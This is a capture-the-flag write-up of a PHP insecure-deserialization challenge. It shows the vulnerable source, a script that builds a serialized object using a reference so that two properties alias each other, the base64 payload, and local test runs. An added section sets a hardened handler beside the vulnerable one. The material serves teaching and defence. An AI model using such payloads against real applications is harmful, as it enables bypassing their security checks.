TSULOTT MeePWN CTF Write Up
We are given a web page. Here is the source code of that web page (obtained through the is_debug=1 parameter, which calls show_source):
<?php
class Object
{
    var $jackpot;
    var $enter;
}
?>
<?php
include('secret.php');   // defines $flag
if(isset($_GET['input']))
{
    // user-controlled serialized data is deserialized as-is
    $obj = unserialize(base64_decode($_GET['input']));
    if($obj)
    {
        // jackpot is overwritten with a fresh draw after unserialize, so a plain
        // serialized value for jackpot never survives to the comparison below
        $obj->jackpot = rand(10,99).' '.rand(10,99).' '.rand(10,99).' '.rand(10,99).' '.rand(10,99).' '.rand(10,99);
        if($obj->enter === $obj->jackpot)
        {
            echo "<center><strong><font color='white'>CONGRATULATION! You Won JACKPOT PriZe !!! </font></strong></center>". "<br><center><strong><font color='white' size='20'>".$obj->jackpot."</font></strong></center>";
            echo "<br><center><strong><font color='green' size='25'>".$flag."</font></strong></center><br>";
            echo "<center><img src='http://www.relatably.com/m/img/cross-memes/5378589.jpg' /></center>";
        }
        else
        {
            echo "<br><br><center><strong><font color='white'>Wrong! True Six Numbers Are: </font></strong></center>". "<br><center><strong><font color='white' size='25'>".$obj->jackpot."</font></strong></center><br>";
        }
    }
    else
    {
        echo "<center><strong><font color='white'>- Something wrong, do not hack us please! -</font></strong></center>";
    }
}
else
{
    echo "";
}
?>
<?php
if (isset($_GET['gen_code']) && !empty($_GET['gen_code']))
{
    $temp = new Object;
    $temp->enter=$_GET['gen_code'];
    $code=base64_encode(serialize($temp));
    echo '<center><font color=\'white\'>Here is your code, please use it to Lott: <strong>'.$code.'</strong></font></center>';
}
?>
<?php
if(isset($_GET['is_debug']) && $_GET['is_debug']==='1')
{
    show_source(__FILE__);
}
?>
We could use PHP unserialize to set jackpot so that it matches enter. But right below the unserialize call, jackpot is overwritten with random values, so whatever we put there gets clobbered.
After the CTF ended, some googling turned up something interesting: PHP references can be used so that the enter variable is always the same as the jackpot variable we supply, since a reference between two properties survives serialize/unserialize.
We build the serialized object with the PHP script below:
<?php
// note: "Object" is a reserved word since PHP 7.2, so run this on PHP 5.x/7.0/7.1
class Object
{
    var $jackpot;
    var $enter;
}
$exp = new Object;
// make enter a reference to jackpot: whatever the server later writes into
// jackpot is exactly what it reads back from enter
$exp->enter =& $exp->jackpot;
$a = serialize($exp);
echo $a."\n";
echo base64_encode($a)."\n";
?>
O:6:"Object":2:{s:7:"jackpot";N;s:5:"enter";R:2;}
and base64-encoded: Tzo2OiJPYmplY3QiOjI6e3M6NzoiamFja3BvdCI7TjtzOjU6ImVudGVyIjtSOjI7fQ==
(R:2 means "reference to slot 2", where slot 1 is the object itself and slot 2 is jackpot.) Let's try it out with the following source code.
<?php
class Object
{
    var $jackpot;
    var $enter;
}
$temp = new Object;
/*$temp->enter=rand(10,99).' '.rand(10,99).' '.rand(10,99).' '.rand(10,99).' '.rand(10,99).' '.rand(10,99);
$temp->jackpot="90 90 90 90 90 90";
$code = base64_encode(serialize($temp));
$oob = unserialize(base64_decode($code));
echo $code;
echo $oob->enter;
echo $oob->jackpot;*/
$exp = new Object;
#$exp->jackpot = "80 80 80 80 80 80";
#$exp->enter = "80 80 80 80 80 80";
$exp->jackpot =& $exp->enter;
$c = serialize($exp);
// round-trip through unserialize, as the server does, and test the copy:
// the reference between jackpot and enter survives serialization
$crud = unserialize($c);
$crud->jackpot = rand(10, 99);
echo $crud->jackpot .' '.$crud->enter."\n";
if($crud->jackpot===$crud->enter){
    echo 'YOU WIN';
} else{
    echo 'YOU LOSE';
}
?>
alfakatsuki@justPC:~$ php is.php
40 40
YOU WIN
alfakatsuki@justPC:~$ php is.php
54 54
YOU WIN
alfakatsuki@justPC:~$ php is.php
90 90
YOU WIN
alfakatsuki@justPC:~$ php is.php
73 73
YOU WIN
alfakatsuki@justPC:~$ php is.php
10 10
YOU WIN
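To make the mechanism and its fix explicit, here is an added example (not the challenge's code and not part of the original write-up) that feeds the same kind of reference payload to the vulnerable check and to a hardened one. The class is named Lott, which is an assumption: "Object" became a reserved word in PHP 7.2, so the original class declaration no longer compiles on current PHP. The function names are also my own.

```php
<?php
// Added example, not the challenge's code: the vulnerable check next to a
// hardened one, both fed the same reference payload. The class name Lott is
// an assumption (the original "Object" is reserved in PHP >= 7.2).
class Lott
{
    public $jackpot;
    public $enter;
}

// Same draw as the challenge: six two-digit numbers separated by spaces.
function drawNumbers(): string
{
    $n = [];
    for ($i = 0; $i < 6; $i++) {
        $n[] = rand(10, 99);
    }
    return implode(' ', $n);
}

// Build the payload from the write-up: "enter" is made a reference to "jackpot",
// which serialize() emits as R:2; (slot 1 is the object, slot 2 is jackpot).
function buildReferencePayload(): string
{
    $exp = new Lott;
    $exp->enter =& $exp->jackpot;
    return base64_encode(serialize($exp));
}

// Vulnerable handler, as in the challenge: the draw is written into the very
// object the user supplied, so an alias inside that object follows the write
// and enter === jackpot holds no matter what was drawn.
function vulnerableCheck(string $input): bool
{
    $obj = unserialize(base64_decode($input));
    if (!$obj) {
        return false;
    }
    $obj->jackpot = drawNumbers();
    return $obj->enter === $obj->jackpot;
}

// Hardened handler. Three changes close the hole:
//  1. allowed_classes => false: no user-chosen class is instantiated; the data
//     comes back as __PHP_Incomplete_Class and is read as a plain array.
//  2. The draw is kept in a local variable that the payload cannot alias; the
//     guess is compared against that local, never against a property of the
//     untrusted object.
//  3. The guess must be a string, so a null or nested value can never match.
function hardenedCheck(string $input): bool
{
    $raw = base64_decode($input, true);
    if ($raw === false) {
        return false;
    }
    $obj = @unserialize($raw, ['allowed_classes' => false]);
    if ($obj === false) {
        return false;
    }
    $props = (array) $obj;
    $guess = $props['enter'] ?? null;
    if (!is_string($guess)) {
        return false;
    }
    $jackpot = drawNumbers();
    return hash_equals($jackpot, $guess);
}

$payload = buildReferencePayload();
echo "payload: $payload\n";
echo "vulnerable check: " . (vulnerableCheck($payload) ? 'WIN' : 'LOSE') . "\n";
echo "hardened check:   " . (hardenedCheck($payload) ? 'WIN' : 'LOSE') . "\n";
```

The hardened handler still accepts serialized input only to show the minimal fix; the cleaner design is to not unserialize user data at all and to carry the guess as a plain query parameter or JSON, neither of which has a reference notation for an attacker to abuse.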
Comment: awesome tutorial, bro